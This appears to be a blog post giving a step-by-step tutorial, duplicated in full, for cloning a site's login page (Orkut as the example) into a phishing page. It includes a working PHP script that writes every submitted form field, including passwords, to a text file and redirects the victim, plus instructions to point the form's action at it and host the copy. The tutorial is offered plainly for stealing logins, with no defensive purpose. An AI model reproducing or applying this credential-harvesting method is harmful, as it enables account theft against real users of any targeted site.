How to make a phisher for any site
How to make phishers for any site...
This is real simple shit!
1. goto the page you want to make a phisher for.
lets take e.g http://orkut.com/
2.right click--> save this page (use firefox for this)
3.goto the directory you saved the page. it should have the .html page and another folder containing
the page's pics or any other css scripts etc.
4.Now create another file and paste the following code
Code:
header("Location: http://www.xxx.com");
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
And save it as lol.php
Go back to your index.htm file and click edit. Press CTRL+F and type in " action= " in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with lol.php. Phish page Done
Remember to change
Code:
header("Location: http://www.xxx.com")(copy paste the original text in "action=" here or
any other page to which you want to redirect to)
;
5. now about the pics. upload the pics to your filehosting site and copy paste those links
and replace the original links in the source code with these links.
6. save the .html file and upload it along with lol.php to the same filehosting site as the pics.
And your Phishers done!!!
If there are still any doubts... ask me at the chat box.
This is real simple shit!
1. goto the page you want to make a phisher for.
lets take e.g http://orkut.com/
2.right click--> save this page (use firefox for this)
3.goto the directory you saved the page. it should have the .html page and another folder containing
the page's pics or any other css scripts etc.
4.Now create another file and paste the following code
Code:
header("Location: http://www.xxx.com");
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
And save it as lol.php
Go back to your index.htm file and click edit. Press CTRL+F and type in " action= " in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with lol.php. Phish page Done
Remember to change
Code:
header("Location: http://www.xxx.com")(copy paste the original text in "action=" here or
any other page to which you want to redirect to)
;
5. now about the pics. upload the pics to your filehosting site and copy paste those links
and replace the original links in the source code with these links.
6. save the .html file and upload it along with lol.php to the same filehosting site as the pics.
And your Phishers done!!!
If there are still any doubts... ask me at the chat box.
Comment Form under post in blogger/blogspot